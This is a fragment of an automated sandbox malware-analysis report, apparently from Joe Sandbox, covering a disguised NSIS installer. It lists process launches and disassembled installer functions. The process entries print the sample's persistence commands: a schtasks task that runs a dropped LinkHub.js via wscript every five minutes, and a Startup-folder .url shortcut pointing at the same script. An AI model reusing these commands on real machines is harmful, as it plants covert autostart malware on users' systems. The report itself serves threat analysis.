Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	31
Start time:	00:23:38
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0xdd0000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	00:23:39
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	00:23:39
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	00:23:39
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
Imagebase:	0x10000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	00:23:39
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & echo URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & exit
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	00:23:39
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	00:23:39
Start date:	07/01/2025
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
Imagebase:	0x7ff6546e0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	00:23:40
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
Imagebase:	0xbb0000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	00:23:51
Start date:	07/01/2025
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
Imagebase:	0x7ff6546e0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	00:23:51
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
Imagebase:	0xbb0000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	18.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.7%
Total number of Nodes:	1525
Total number of Limit Nodes:	33

Executed Functions

Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040512F
GetDlgItem.USER32(?,000003EE), ref: 0040513E
GetClientRect.USER32(?,?), ref: 00405196
GetSystemMetrics.USER32(00000015), ref: 0040519E
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
ShowWindow.USER32(?,00000008), ref: 0040523A
GetDlgItem.USER32(?,000003EC), ref: 0040525B
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
GetDlgItem.USER32(?,000003F8), ref: 0040514D

Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

GetDlgItem.USER32(?,000003EC), ref: 004052AB
CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
CloseHandle.KERNELBASE(00000000), ref: 004052C0
ShowWindow.USER32(00000000), ref: 004052E7
ShowWindow.USER32(?,00000008), ref: 004052EC
ShowWindow.USER32(00000008), ref: 00405333
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
CreatePopupMenu.USER32 ref: 00405376
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
GetWindowRect.USER32(?,?), ref: 0040539E
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
OpenClipboard.USER32(00000000), ref: 0040540B
EmptyClipboard.USER32 ref: 00405411
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
GlobalLock.KERNEL32(00000000), ref: 00405427
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
GlobalUnlock.KERNEL32(00000000), ref: 0040545D
SetClipboardData.USER32(0000000D,00000000), ref: 00405468
CloseClipboard.USER32 ref: 0040546E

Strings

{, xrefs: 00405352
New install of "%s" to "%s", xrefs: 00405182
@rD, xrefs: 004053D7

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: @rD$New install of "%s" to "%s"${
API String ID: 2110491804-2409696222
Opcode ID: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
Opcode Fuzzy Hash: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038A2
SetErrorMode.KERNELBASE(00008001), ref: 004038AD
OleInitialize.OLE32(00000000), ref: 004038B4

Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327

SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
CoUninitialize.COMBASE(?), ref: 00403AD1
ExitProcess.KERNEL32 ref: 00403AF1
lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40

Strings

SeShutdownPrivilege, xrefs: 00403C16
NSIS Error, xrefs: 004038E2
NCRC, xrefs: 0040397C
_?=, xrefs: 00403A64
~nsu.tmp, xrefs: 00403AF7
\Temp, xrefs: 00403A1B
/D=, xrefs: 004039A6
Error launching installer, xrefs: 00403A7D
1C, xrefs: 00403B56

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
API String ID: 2435955865-239407132
Opcode ID: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
Opcode Fuzzy Hash: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47

Strings

@%F, xrefs: 00406A53
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004069DF
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406926
@%F, xrefs: 0040682C

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3581403547-784952888
Opcode ID: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
Opcode Fuzzy Hash: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D

Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86

Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
GetProcAddress.KERNEL32(00000000), ref: 00406327

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC

Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
FindClose.KERNEL32(00000000), ref: 004062EC

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
ShowWindow.USER32(?), ref: 004054D2
DestroyWindow.USER32 ref: 004054E6
SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
GetDlgItem.USER32(?,?), ref: 00405523
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
IsWindowEnabled.USER32(00000000), ref: 0040553E
GetDlgItem.USER32(?,00000001), ref: 004055ED
GetDlgItem.USER32(?,00000002), ref: 004055F7
SetClassLongW.USER32(?,000000F2,?), ref: 00405611
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
GetDlgItem.USER32(?,00000003), ref: 00405708
ShowWindow.USER32(00000000,?), ref: 0040572A
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
EnableWindow.USER32(?,?), ref: 00405757
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
EnableMenuItem.USER32(00000000), ref: 00405774
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
SetWindowTextW.USER32(?,00447240), ref: 004057DC
ShowWindow.USER32(?,0000000A), ref: 00405910

Strings

@rD, xrefs: 004057B9

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: @rD
API String ID: 3282139019-3814967855
Opcode ID: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
Opcode Fuzzy Hash: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
Call: %d, xrefs: 0040165A
Jump: %d, xrefs: 00401602
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
